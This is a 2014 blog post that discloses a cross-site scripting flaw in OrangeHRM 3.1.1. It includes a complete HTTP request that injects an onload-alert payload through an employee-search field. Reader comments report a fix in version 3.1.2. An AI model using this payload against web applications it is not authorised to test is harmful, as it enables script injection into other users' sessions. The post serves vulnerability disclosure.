Friday, 28 February 2014

[EN] XSS in OrangeHRM

# ==============================================================
# Title ...| XSS vulnerability in OrangeHRM
# Version .| OrangeHRM 3.1.1
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.orangehrm.com
# ==============================================================

[+] from admin user:

# ==============================================================
# XSS

---<request>---
POST /k/cms/orange/orangehrm-3.1.1/symfony/web/index.php/pim/viewEmployeeList HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 418

empsearch%5Bemployee_name%5D%5BempName%5D=asdasd&empsearch%5Bemployee_name%5D%5BempId%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&empsearch%5Bid%5D=&empsearch%5Bemployee_status%5D=0&empsearch%5Btermination%5D=1&empsearch%5Bsupervisor_name%5D=asdasd&empsearch%5Bjob_title%5D=0&empsearch%5Bsub_unit%5D=0&empsearch%5BisSubmitted%5D=yes&empsearch%5B_csrf_token%5D=109e14ec2ad65dc3a8eaa4bf8c28582a&pageNo=&hdnAction=search
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

3 comments:

  1. This reported issue is fixed by OrangeHRM, and the latest OrangeHRM open source version is released.

    OrangeHRM 3.1.2 has been released to SourceForge with security related fixes.
    Released on (May 20, 2014)

    Download URL of zip archive : http://sourceforge.net/projects/orangehrm/files/stable/3.1.2/orangehrm-3.1.2.zip/download

    ReplyDelete
  2. This issue has been fixed in OrangeHRM 3.1.2 & released to Source Forge as an active stable release on May 28, 2014.

    Download URL of zip archive : http://sourceforge.net/projects/orangehrm/files/stable/3.1.2/orangehrm-3.1.2.zip/download

    ReplyDelete
  3. Kavitha: big thanks for the update ;)

    iyomi: thank you too ;)

    If you will have any questions, feel free to contact me.

    o/

    ReplyDelete

What do You think...?